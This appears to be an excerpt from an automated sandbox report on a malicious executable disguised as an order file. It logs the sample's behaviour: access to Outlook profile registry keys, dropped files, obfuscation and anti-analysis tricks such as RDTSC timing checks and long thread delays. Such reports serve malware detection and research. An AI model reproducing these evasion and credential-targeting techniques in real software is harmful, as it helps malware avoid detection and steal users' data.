            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeFile written: C:\ProgramData\Microsoft\Windows\Start Menu\corruptive.iniJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Order NO 000293988494948595850000595995000.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2416834766.0000000004E77000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 0_2_74331BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_74331BFF
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 0_2_743330C0 push eax; ret 0_2_743330EE
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_00120C53 push ebx; retf 11_2_00120C52
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_00120C45 push ebx; retf 11_2_00120C52
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_00120C6D push edi; retf 11_2_00120C7A
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeCode function: 11_2_38203FC8 push 24385BDAh; retf 11_2_38203FD5
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeFile created: C:\Users\user\AppData\Local\Temp\nszD14F.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\corruptive.iniJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeAPI/Special instruction interceptor: Address: 5011A02
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeAPI/Special instruction interceptor: Address: 3721A02
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeRDTSC instruction interceptor: First address: 4FEBB1B second address: 4FEBB1B instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FF130505848h 0x00000006 test ah, dh 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeRDTSC instruction interceptor: First address: 36FBB1B second address: 36FBB1B instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FF131014328h 0x00000006 test ah, dh 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeMemory allocated: 120000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeMemory allocated: 34F30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeMemory allocated: 36F30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 599519Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 599391Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 599281Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 599172Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 598815Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 598688Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 598469Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 598235Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Users\user\Desktop\Order NO 000293988494948595850000595995000.exeThread delayed: delay time: 597735Jump to behavior
